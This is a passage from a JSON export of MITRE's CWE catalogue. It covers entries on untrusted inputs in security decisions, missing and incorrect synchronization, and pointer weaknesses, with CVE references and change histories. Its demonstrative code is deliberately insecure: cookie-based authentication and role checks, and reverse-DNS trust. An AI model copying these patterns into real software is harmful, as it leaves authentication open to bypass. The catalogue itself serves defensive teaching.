Design","Implementation"],"Strategy":"Attack Surface Reduction","Description":{"xhtml:p":["Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls.","Identify all inputs that are used for security decisions and determine if you can modify the design so that you do not have to rely on submitted inputs at all. For example, you may be able to keep critical information about the user\'s session on the server side instead of recording it within external data."]}}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-15"},"Intro_Text":"The following code excerpt reads a value from a browser cookie to determine the role of the user.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Cookie[] cookies = request.getCookies();for (int i =0; i&lt; cookies.length; i++) {}","xhtml:br":"","xhtml:div":{"#text":"Cookie c = cookies[i];if (c.getName().equals(\\"role\\")) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"userRole = c.getValue();","attr":{"@_style":"margin-left:10px;"}}}}}},{"attr":{"@_Demonstrative_Example_ID":"DX-16"},"Intro_Text":"The following code could be for a medical records application. It performs authentication by checking if a cookie has been set.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$auth = $_COOKIES[\'authenticated\'];if (! $auth) {}DisplayMedicalHistory($_POST[\'patient_ID\']);","xhtml:br":["",""],"xhtml:div":{"#text":"if (AuthenticateUser($_POST[\'user\'], $_POST[\'password\']) == \\"success\\") {}else {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"// save the cookie to send out in future responsessetcookie(\\"authenticated\\", \\"1\\", time()+60*60*2);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"ShowLoginScreen();die(\\"\\\\n\\");","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":""}}},"Body_Text":["The programmer expects that the AuthenticateUser() check will always be applied, and the \\"authenticated\\" cookie will only be set when authentication succeeds. The programmer even diligently specifies a 2-hour expiration for the cookie.","However, the attacker can set the \\"authenticated\\" cookie to a non-zero value such as 1. As a result, the $auth variable is 1, and the AuthenticateUser() check is not even performed. The attacker has bypassed the authentication."]},{"attr":{"@_Demonstrative_Example_ID":"DX-17"},"Intro_Text":"In the following example, an authentication flag is read from a browser cookie, thus allowing for external control of user state data.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Cookie[] cookies = request.getCookies();for (int i =0; i&lt; cookies.length; i++) {}","xhtml:br":"","xhtml:div":{"#text":"Cookie c = cookies[i];if (c.getName().equals(\\"authenticated\\") &amp;&amp; Boolean.TRUE.equals(c.getValue())) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"authenticated = true;","attr":{"@_style":"margin-left:10px;"}}}}}},{"attr":{"@_Demonstrative_Example_ID":"DX-93"},"Intro_Text":"The following code samples use a DNS lookup in order to decide whether or not an inbound request is from a trusted host. If an attacker can poison the DNS cache, they can gain trusted status.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"struct hostent *hp;struct in_addr myaddr;char* tHost = \\"trustme.example.com\\";myaddr.s_addr=inet_addr(ip_addr_string);hp = gethostbyaddr((char *) &amp;myaddr, sizeof(struct in_addr), AF_INET);if (hp &amp;&amp; !strncmp(hp-&gt;h_name, tHost, sizeof(tHost))) {} else {}","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"trusted = true;","attr":{"@_style":"margin-left:10px;"}},{"#text":"trusted = false;","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String ip = request.getRemoteAddr();InetAddress addr = InetAddress.getByName(ip);if (addr.getCanonicalHostName().endsWith(\\"trustme.com\\")) {}","xhtml:br":["",""],"xhtml:div":{"#text":"trusted = true;","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"IPAddress hostIPAddress = IPAddress.Parse(RemoteIpAddress);IPHostEntry hostInfo = Dns.GetHostByAddress(hostIPAddress);if (hostInfo.HostName.EndsWith(\\"trustme.com\\")) {}","xhtml:br":["",""],"xhtml:div":{"#text":"trusted = true;","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":"IP addresses are more reliable than DNS names, but they can also be spoofed. Attackers can easily forge the source IP address of the packets they send, but response packets will return to the forged IP address. To see the response packets, the attacker has to sniff the traffic between the victim machine and the forged IP address. In order to accomplish the required sniffing, attackers typically attempt to locate themselves on the same subnet as the victim machine. Attackers may be able to circumvent this requirement by using source routing, but source routing is disabled across much of the Internet today. In summary, IP address verification can be a useful part of an authentication scheme, but it should not be the single factor required for authentication."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-1549","Description":"Attacker can bypass authentication by setting a cookie to a specific value.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1549"},{"Reference":"CVE-2009-1619","Description":"Attacker can bypass authentication and gain admin privileges by setting an \\"admin\\" cookie to 1.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1619"},{"Reference":"CVE-2009-0864","Description":"Content management system allows admin privileges by setting a \\"login\\" cookie to \\"OK.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0864"},{"Reference":"CVE-2008-5784","Description":"e-dating application allows admin privileges by setting the admin cookie to 1.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5784"},{"Reference":"CVE-2008-6291","Description":"Web-based email list manager allows attackers to gain admin privileges by setting a login cookie to \\"admin.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6291"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SEC09-J","Entry_Name":"Do not base security checks on untrusted sources"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-754"}},{"attr":{"@_External_Reference_ID":"REF-529"}},{"attr":{"@_External_Reference_ID":"REF-756"}},{"attr":{"@_External_Reference_ID":"REF-45"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-01-18"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"820":{"attr":{"@_ID":"820","@_Name":"Missing Synchronization","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software utilizes a shared resource in a concurrent manner but does not attempt to synchronize access to the resource.","Extended_Description":"If access to a shared resource is not synchronized, then the resource may not be in a state that is expected by the software. This might lead to unexpected or insecure behaviors, especially if an attacker can influence the shared resource.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Other"],"Impact":["Modify Application Data","Read Application Data","Alter Execution Logic"]}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code intends to fork a process, then have both the parent and child processes print a single line.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"static void print (char * string) {}int main(void) {}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char * word;int counter;for (word = string; counter = *word++; ) {}","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"putc(counter, stdout);fflush(stdout);sleep(1);","xhtml:br":["","","",""],"xhtml:i":"/* Make timing window a little larger... */"}}}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"pid_t pid;pid = fork();if (pid == -1) {}else if (pid == 0) {}else {}exit(0);","xhtml:br":["","","","","",""],"xhtml:div":[{"#text":"exit(-2);","attr":{"@_style":"margin-left:10px;"}},{"#text":"print(\\"child\\\\n\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"print(\\"PARENT\\\\n\\");","attr":{"@_style":"margin-left:10px;"}}]}}],"xhtml:br":["",""]}},"Body_Text":["One might expect the code to print out something like:",{"xhtml:div":{"xhtml:div":["PARENT","child"]}},"However, because the parent and child are executing concurrently, and stdout is flushed each time a character is printed, the output might be mixed together, such as:",{"xhtml:div":{"xhtml:div":["PcAhRiElNdT","[blank line]","[blank line]"]}}]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"LCK05-J","Entry_Name":"Synchronize access to static fields that can be modified by untrusted code"}},"Notes":{"Note":{"#text":"Deeper research is necessary for synchronization and related mechanisms, including locks, mutexes, semaphores, and other mechanisms. Multiple entries are dependent on this research, which includes relationships to concurrency, race conditions, reentrant functions, etc.  CWE-662 and its children - including CWE-667, CWE-820, CWE-821, and others - may need to be modified significantly, along with their relationships.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-08-06"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-23","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"821":{"attr":{"@_ID":"821","@_Name":"Incorrect Synchronization","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software utilizes a shared resource in a concurrent manner, but it does not correctly synchronize access to the resource.","Extended_Description":"If access to a shared resource is not correctly synchronized, then the resource may not be in a state that is expected by the software. This might lead to unexpected or insecure behaviors, especially if an attacker can influence the shared resource.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Other"],"Impact":["Modify Application Data","Read Application Data","Alter Execution Logic"]}},"Notes":{"Note":{"#text":"Deeper research is necessary for synchronization and related mechanisms, including locks, mutexes, semaphores, and other mechanisms. Multiple entries are dependent on this research, which includes relationships to concurrency, race conditions, reentrant functions, etc.  CWE-662 and its children - including CWE-667, CWE-820, CWE-821, and others - may need to be modified significantly, along with their relationships.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-08-06"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-23","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"822":{"attr":{"@_ID":"822","@_Name":"Untrusted Pointer Dereference","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The program obtains a value from an untrusted source, converts this value to a pointer, and dereferences the resulting pointer.","Extended_Description":{"xhtml:p":["An attacker can supply a pointer for memory locations that the program is not expecting. If the pointer is dereferenced for a write operation, the attack might allow modification of critical program state variables, cause a crash, or execute code. If the dereferencing operation is for a read, then the attack might allow reading of sensitive data, cause a crash, or set a program variable to an unexpected value (since the value will be read from an unexpected memory location).","There are several variants of this weakness, including but not necessarily limited to:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["The untrusted value is directly invoked as a function call.","In OS kernels or drivers where there is a boundary between \\"userland\\" and privileged memory spaces, an untrusted pointer might enter through an API or system call (see CWE-781 for one such example).","Inadvertently accepting the value from an untrusted control sphere when it did not have to be accepted as input at all. This might occur when the code was originally developed to be run by a single user in a non-networked environment, and the code is then ported to or otherwise exposed to a networked environment."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"125","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"787","@_View_ID":"1000"}}]},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Memory","Note":"If the untrusted pointer is used in a read operation, an attacker might be able to read sensitive portions of memory."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"If the untrusted pointer references a memory location that is not accessible to the program, or points to a location that is \\"malformed\\" or larger than expected by a read or write operation, the application may terminate unexpectedly."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Execute Unauthorized Code or Commands","Modify Memory"],"Note":"If the untrusted pointer is used in a function call, or points to unexpected data in a write operation, then code execution may be possible."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-5655","Description":"message-passing framework interprets values in packets as pointers, causing a crash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5655"},{"Reference":"CVE-2010-2299","Description":"labeled as a \\"type confusion\\" issue, also referred to as a \\"stale pointer.\\" However, the bug ID says \\"contents are simply interpreted as a pointer... renderer ordinarily doesn\'t supply this pointer directly\\". The \\"handle\\" in the untrusted area is replaced in one function, but not another - thus also, effectively, exposure to wrong sphere (CWE-668).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2299"},{"Reference":"CVE-2009-1719","Description":"Untrusted dereference using undocumented constructor.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1719"},{"Reference":"CVE-2009-1250","Description":"An error code is incorrectly checked and interpreted as a pointer, leading to a crash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1250"},{"Reference":"CVE-2009-0311","Description":"An untrusted value is obtained from a packet and directly called as a function pointer, leading to code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0311"},{"Reference":"CVE-2010-1818","Description":"Undocumented attribute in multimedia software allows \\"unmarshaling\\" of an untrusted pointer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1818"},{"Reference":"CVE-2010-3189","Description":"ActiveX control for security software accepts a parameter that is assumed to be an initialized pointer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3189"},{"Reference":"CVE-2010-1253","Description":"Spreadsheet software treats certain record values that lead to \\"user-controlled pointer\\" (might be untrusted offset, not untrusted pointer).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1253"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"129"}}},"Notes":{"Note":[{"#text":"There are close relationships between incorrect pointer dereferences and other weaknesses related to buffer operations. There may not be sufficient community agreement regarding these relationships. Further study is needed to determine when these relationships are chains, composites, perspective/layering, or other types of relationships. As of September 2010, most of the relationships are being captured as chains.","attr":{"@_Type":"Maintenance"}},{"#text":"Many weaknesses related to pointer dereferences fall under the general term of \\"memory corruption\\" or \\"memory safety.\\" As of September 2010, there is no commonly-used terminology that covers the lower-level variants.","attr":{"@_Type":"Terminology"}},{"#text":"Under-studied and probably under-reported as of September 2010. This weakness has been reported in high-visibility software, but applied vulnerability researchers have only been investigating it since approximately 2008, and there are only a few public reports. Few reports identify weaknesses at such a low level, which makes it more difficult to find and study real-world code examples.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-09-22"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"823":{"attr":{"@_ID":"823","@_Name":"Use of Out-of-range Pointer Offset","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The program performs pointer arithmetic on a valid pointer, but it uses an offset that can point outside of the intended range of valid memory locations for the resulting pointer.","Extended_Description":{"xhtml:p":["While a pointer can contain a reference to any arbitrary memory location, a program typically only intends to use the pointer to access limited portions of memory, such as contiguous memory used to access an individual array.","Programs may use offsets in order to access fields or sub-elements stored within structured data. The offset might be out-of-range if it comes from an untrusted source, is the result of an incorrect calculation, or occurs because of another error.","If an attacker can control or influence the offset so that it points outside of the intended boundaries of the structure, then the attacker may be able to read or write to memory locations that are used elsewhere in the program. As a result, the attack might change the state of the software as accessed through program variables, cause a crash or instable behavior, and possibly lead to code execution."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"125","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"787","@_View_ID":"1000"}}]},"Alternate_Terms":{"Alternate_Term":{"Term":"Untrusted pointer offset","Description":"This term is narrower than the concept of \\"out-of-range\\" offset, since the offset might be the result of a calculation or other error that does not depend on any externally-supplied values."}},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Memory","Note":"If the untrusted pointer is used in a read operation, an attacker might be able to read sensitive portions of memory."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"If the untrusted pointer references a memory location that is not accessible to the program, or points to a location that is \\"malformed\\" or larger than expected by a read or write operation, the application may terminate unexpectedly."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Execute Unauthorized Code or Commands","Modify Memory"],"Note":"If the untrusted pointer is used in a function call, or points to unexpected data in a write operation, then code execution may be possible."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2010-2160","Description":"Invalid offset in undocumented opcode leads to memory corruption.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2160"},{"Reference":"CVE-2010-1281","Description":"Multimedia player uses untrusted value from a file when using file-pointer calculations.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1281"},{"Reference":"CVE-2009-3129","Description":"Spreadsheet program processes a record with an invalid size field, which is later used as an offset.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3129"},{"Reference":"CVE-2009-2694","Description":"Instant messaging library does not validate an offset value specified in a packet.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694"},{"Reference":"CVE-2009-2687","Description":"Language interpreter does not properly handle invalid offsets in JPEG image, leading to out-of-bounds memory access and crash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2687"},{"Reference":"CVE-2009-0690","Description":"negative offset leads to out-of-bounds read","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0690"},{"Reference":"CVE-2008-4114","Description":"untrusted offset in kernel","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4114"},{"Reference":"CVE-2010-2873","Description":"\\"blind trust\\" of an offset value while writing heap memory allows corruption of function pointer,leading to code execution","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2873"},{"Reference":"CVE-2010-2866","Description":"negative value (signed) causes pointer miscalculation","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2866"},{"Reference":"CVE-2010-2872","Description":"signed values cause incorrect pointer calculation","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2872"},{"Reference":"CVE-2007-5657","Description":"values used as pointer offsets","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5657"},{"Reference":"CVE-2010-2867","Description":"a return value from a function is sign-extended if the value is signed, then used as an offset for pointer arithmetic","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2867"},{"Reference":"CVE-2009-1097","Description":"portions of a GIF image used as offsets, causing corruption of an object pointer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1097"},{"Reference":"CVE-2008-1807","Description":"invalid numeric field leads to a free of arbitrary memory locations, then code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1807"},{"Reference":"CVE-2007-2500","Description":"large number of elements leads to a free of an arbitrary address","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2500"},{"Reference":"CVE-2008-1686","Description":"array index issue (CWE-129) with negative offset, used to dereference a function pointer","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1686"},{"Reference":"CVE-2010-2878","Description":"\\"buffer seek\\" value - basically an offset?","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2878"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"129"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, &#34;Pointer Arithmetic&#34;, Page 277"}}},"Notes":{"Note":[{"#text":"There are close relationships between incorrect pointer dereferences and other weaknesses related to buffer operations. There may not be sufficient community agreement regarding these relationships. Further study is needed to determine when these relationships are chains, composites, perspective/layering, or other types of relationships. As of September 2010, most of the relationships are being captured as chains.","attr":{"@_Type":"Maintenance"}},{"#text":"Many weaknesses related to pointer dereferences fall under the general term of \\"memory corruption\\" or \\"memory safety.\\" As of September 2010, there is no commonly-used terminology that covers the lower-level variants.","attr":{"@_Type":"Terminology"}},{"#text":"Under-studied and probably under-reported as of September 2010. This weakness has been reported in high-visibility software, but applied vulnerability researchers have only been investigating it since approximately 2008, and there are only a few public reports. Few reports identify weaknesses at such a low level, which makes it more difficult to find and study real-world code examples.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-09-22"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"824":{"attr":{"@_ID":"824","@_Name":"Access of Uninitialized Pointer","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The program accesses or uses a pointer that has not been initialized.","Extended_Description":{"xhtml:p":["If the pointer contains an uninitialized value, then the value might not point to a valid memory location. This could cause the program to read from or write to unexpected memory locations, leading to a denial of service. If the uninitialized pointer is used as a function call, then arbitrary functions could be invoked. If an attacker can influence the portion of uninitialized memory that is contained in the pointer, this weakness could be leveraged to execute code or perform other attacks.","Depending on memory layout, associated memory management behaviors, and program operation, the attacker might be able to influence the contents of the uninitialized pointer, thus gaining more fine-grained control of the memory location to be 